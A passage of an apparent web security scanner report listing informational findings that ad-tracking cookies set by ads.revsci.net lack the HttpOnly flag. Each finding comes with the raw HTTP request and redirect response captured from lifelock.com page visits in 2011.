rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NlSe="MLsXr08uMT5n4BD3bLua7kUHKxycqFuHHYWrQ4CcmI8DWfWhTlgNS3bAhAe5Ek6MTKFNTT5xYaf4SRDbPGD9pzbuj7m3W9LehF9HBn8KpH5maLzmo/IEYGm7ZsUglwRaDpS5XjA7brvD0QxRDVCLNbezOsf0yoqeO4c9EfAZWEqBka72ko6UicWuG1yTBBss9ckcEDqRZwS4RMHgTDyNbZtXdwEX5eFl3+RCbqZ+L5dJtYUpZZz6Q6z8dXjprrK/cKVEi+YyPq9Z14+HRRl2OLIVdWQbBiBD/7TuEYKhZnZfNuGiEAKk+jB3BMi6NjJ/X4+zFjN4JIVambd/JpUPzroQ0nl7LNG8eII/VzxFlhp4C3BW5XBxBS+tnLnyILAgwEQIeWrRbOj1i8mDDDnMo6DH5j2110rT0dL2EQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtea7ubdYdxLy/lJT87u7OZ5hB4giwRLN67eJ02IAcpR9TattCy1Zb/ZGpqmMoG8gcE7LQ6jRkwYJBMpzLVaLXE2wLlSuQot46gmeeqQPhHlUjaPpsrgyHurE0UGdaGp3HtPfYQ0zoxLNvYWePVBi2GG3GdLN6NcUgYQs1Lspv8+3ieiZR3aN0Q5peAGU44tgNRwckUHjN35lSoNd85yzoKZUuAE9pP2A+YQfoGhYngbrTf8bwilg368Sy3x8qoPLnh3X53wX8I/IETXdm5bpdAoE2hTTZ6K1H0VU/gQAwoaXw+iPHX2eAIdHHdoaYpmT+ERLJsiANnM9Z5EFziSdC96w48tMQoukW4Ksl1ZOopa7GC8HPFVaD6t3U32r9sbTyZkKK8QA8JbzsDvfwIxbEP2PUVHeXmSSxv1yl+5zD2aqQXy3rE21OIbQG0Txff9Q6+QE4SRR2rr8yhSPM0aOTW2BlGO9zv4pDblC5CNIG8rXO1JkD/C3oThuUHWYhoeO8DtDWYMdqMr2m9VrGEceghR5JD3D8RHf7LpHhsuJx3jJotF3dxCG7MV8zDAMz2B/rQJKMvNjijXT0lUoyMHEc7PYlC/UHPRjdNEbjfsyU3vHiIPcXm2URkNHzlWjj0emnFiAyQHyCPxWKWPn7u21hzyVmNjG99yAYWX+wAazYRfFR/c8+aIvtHtKLiK9T5jCISpw2ZmX4RnayGawcJnnPsCNUloDfJ0JTMwujfD6FlxPPXvlu380sfvmSiRjZvQCuIB370j6Ksga3WpNkZQkX3KGJU3hM+yZb5MzFP5k5bsnJ55jGqCtm0c6Mi0rqxK9yOEGjkcPV/zGQXuqqJMtWozTmjQ2ukOQWf0aZ2mu2NrC05+ZgOoOQt2UIjUKH5vWWG5ekz2hDMNgjVap5KFmOT3Cz5jpI4zA90AVCQTPC3swcaxfRCaPlIafa8pX4vh5WMEVqajOSPgq3gvJ1//x8UgIOQfpJr5p0lQkqGP3RDrUzvdEy1l0+YhekA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:17:25 GMT


18.194. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_P7r0="MLsXr98vcS5joAD3cWkfYUw1tIebrb2QmbdXm6j+DYZlI1D1a3Tl+WEpJX+o5AVFSd5d5ssFR9oWBmypI3QRTMd9I/6PS5OftgRmlbDwxFXRsomko1dhpOEfNP9Muk7A5fpJA9ZIm9+6k7zkh9lqBggAx3WL73+UqHqWE9mqgfVjx95nS6LtBhwKfHpSuWuuicmA3XLrG/+6SmU7XfZ3vRJvMOZscGw9+k14L5j+8HB8G/lNCz0tdz1Tc2vQUbdF6KzgbPJFbgeJsZqz9k5fJFuQpYQFji9Nz3OiNrFoynbIaswV9vt49UKLLPZepEQ/oN+mzl/1Qh2LgJ7ymTn6+IQ1Z099Mr8aFo0hS2iVvUixSTrzNVqt5+6nSiH5x/g0FykecCVC5C26nN221SEyIUg/ul5Ntl5t2fX3Iw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuqwsoHteb7Jy7CW7w++Pj1nwUVKp5hB4giwRLN67eJ02IAcpR9TattCy1ZV/af3UntXFMcTHLwgRLgVdrk3Un+lJb3XnISlxM6BwpK+G0zxnclGkFzoNLleoxfXMdWEFNQlueEHqKk4v8m5CO/1Qayo6PXF0eauPV3c9T7EXoQk9NosQRnmyfAEFMPzdRxVKMZFFWBmTNLKvtHp+vkrNGGBoWZxDuFNdv4/9IGwxj5DMN9P3+raB05GBl1RM19ZujiRucYx7VVLswcQ1f1IUJRi09VP17SjeXF8PS1byMLog6r6JCmXM3DqCcDgTey7qTq6UdcC6c8x1UKaGRBOXNBq40P8xlqadT3fMivsaDXJyrPQksA71/JBfiBaR0kwCpKdeKLwh8P6+yClVnEcjrvgGFWU11CuWSGP4FzeQHic0pmrIQI7nLti10sFMz45YNec6XtAETkLs4MrS7F/mWIGZg0CVWb7mIA03xQ7zaLFmmgZA12uHXVDC6gV6smrutzBGpONeRN+LLR/l/NJOPApKr4HufQlUic+onWy9BWBBBVshcAq/LnvU1teB5UtYJ5C7P5mAr3OpuLKlHgfTGmttpgL0VyXzDTMGfmjw5nw6zHe7hs/J4H1mUfavc8FBOR6/bA0W84f3td3Pu18/klzx83xfxzHLuvw+TAEAtq1RGzg2PCmuu8Y6QRKWJqVRxAnwvNGM+FpcP/8Ir28/iz06imcQMug/OgNlMKedDlb1HVV9vVC7wnwKHKuJVDpVUb8NTQhrRQmDqSpJpdJn794JnJXLhivCBU0WzWeHPbOEHBIl5z45JWeVQIhp4ndY8gmWjouvoAjhA9vRU5f9UAjWnb+jNhP/VDoBujW/BJn1lP2ClLCBd/tfP7Nth6C+TTvWamjMT/Qpws8yJwjPizFzD5BRmgQaZd81bFD7w5YAU7KxZZwMiLN2G7rfW/kp2not+A8UFWV5bSZUiCOJVh9IFhoqH5TFLLH6cbSAzmpWKVtHQINiZqOUh8Q2Fffg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_P7r0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_P7r0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qG2X="MLsXr98vcS5joAD3cWnDV5Aua+GKE1cvxxz+0wdb2PxBN+R0RSFIK3cKZz8oN8G0yqulX+Nkf2VPR8zp6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh25YJ3Frzvooelti6k6zEn9lqBoAPz3WL73/oqHqWE9msgfVjx54HC6LNBhwOenpSuWuuicmA1XLrG/+6SmU7XfZ3vRJvMOZscGw9+k14L5j+8HB8G/lNCz0tdz1Tc2vQUbdF6KzgbPJFbYeJsZqz7lJfJFuQpYQFji9Nz3OiNrFoynbIbswV9vt49UKLLPZepEQ/oN+mzl/1Qh17QJ7ymTn6uPQ1Z099Mr8aFo0hS2iVvUixSTrzFVqt5+6nSiH5x/g0FykecCVC5C26nNIAO87Eu6zn3T771H9zRfah"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuqPsoH0VbKubdsLk5r8wYeKsfmvlTnrTzC5CfKnr32xlBVUczupVXWj3FnXNhNKx380C8gcE42639XwfAZ6AN2wX432Ggb+oNrVPQ3ZsOiWiEb6hJRtTKjmlJB5kt0o25kgS8xzsx140xDKigOe0nBSh8SycCIjKIXd8r6oBXIvm+mcpWCFK3py4McUT+aqPCxrJgiL1gmh/scyTrzBd7mi7j9Db8srmSpf9xH0manrGb3tTyLo9BzeM1pm4Z4wx42sitL/m0igJmBrNFIFdykeCPg5uaizqUsZbaaHNm75ZLAWADSD4+BTlHIFaYr4KcFljhkAzize7Mn1KQw+CY9n303LyCBHUX9Kq3ldlPQApQqwYwV5J8AomnJVkHK1WvaebvwjFxCe5abtr6+wm72l2qalAUmYSvTytwcTpqorZOrQqKSMuDssCULulgY7V6e4aRMbmgcF6d5vsb3VgMvEGEsch/Q6r2FzCKHbl6J5faoGwtTri343e73QfF/jyynnhcASryHb8nbpP6AD8auyeSIZLWjI9NWXhcTaMnyjgr8KUJ+RnV5P/WnnhfxeAzX9WAXYCyIItwmAiCEv6SZZLJ0oRXlJc7IwUQLA9wp9kMa3+pX4+Xv1UnR6Zoq/+eG3PaKAGVjXjXqU6HjfcEmNk+gewe5Qq6bX1b7U+tSdLAZcbvGgOch3VHJWX9SpL5QvXWovkDL40JIh557lJuK5HqysZzzbuVqpqOzMNkkD4C6oVShvoT540zXtwVrWzkCr11RoH0k0o9qPoxURd9KkGvTXu+gE5MD+jvjrPFcvO5yYVrQeKB+AZTTfjvoU7f3fIyKlcEOQyYs8W7Y2xWwRWywsuPPtpapCLyjytrZMHckyzgw/+NrKldEEogM7w5wA73pbo1MlGNnRAXV05K73LQiYXCmAeF1XflZNg3yUjPBNmGcibNUxe95+gPq0t8K50MIGZU4Qp5wi13m0qzoEVxhx94xzDLBId/GO9ydgF0Kb7brfLNrULXMHgZlCFQ2"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:47:46 GMT


18.195. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtWbj6GKPTeto2o206rx7XdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9FXqajQPusTp1Jcs8ZjfglfknWAN/Q1IfyZw5h0t1bS95yIeZFtkPXSC2LxApOiqcQjM6vzFrEqEYTBt+vGOrPGvAgmk6EujcF1pARpPpVf1t8GJcgXgZqGCYmfomxtXdEgF5VKMZEFWBmbNUKntEp+ukrNGGBkXCmINvvD2jww0YZ7hmZNBoLNjfcex0Zl4CJC36Z4USPuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFf/+1/xUY2A6W6SqbcuheULZgHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2SFYgoO7k+RZWUd0XDMaGcg3JqM/wuDmnuWWb0A4COsclOeEQtHtMWW3/snkkNcgVm7VDJfkCm6cjOTrvlOItggKPIusbL1l9SCaB99VdIjRitqqb3WE8ef2luiUylYJxjwzBtb+QBbLiC7/pZjNWAycY5tP/aRFsAiCBupTjGYjm2g0lHMDqDrmlPMoscSYxhTTPv0KuN3m/EHY62T5Ybif1g+5CbvHd48MQZdo4gIxa2ziYKirixPgI/vnDwea4BL4iinQWN+AIncp4UYoiLCWtpcrIRtS9MgPS6DIFnjQGyv2+z+jIrmAoHMMiwl2RATjCQeV+rkFcTCsGNYksONovJdR5NKAGZWNoFpiSfZPYB1taJHpApkWWC5HQR2TSEsOPvnrTO97GqGy3v+4KyaxwMFuCLHS2kq0YgKXQMBA7NAdk77MeO9hTm31Gm0RKqWr8kM45JW+VUIho7H9Y8jWf7dAfdzDjskSOFAYILVnxSgKnS47RV57TZ72P1HE0E82c+PZVqML3+BjNrt1HwJ5CeCU3tHXiQJc2q8DAT4Eh6R5wsQQa1LW7rHc8JX9ATBuaDtmPphjkIZ8U0vbrZ9Ik58JYB0K4lccxDWK7o1rKItXy97q+0Szc2/Ipa3ZbyO1slKuyCzgqZbam9cmA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:31 GMT


18.196. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
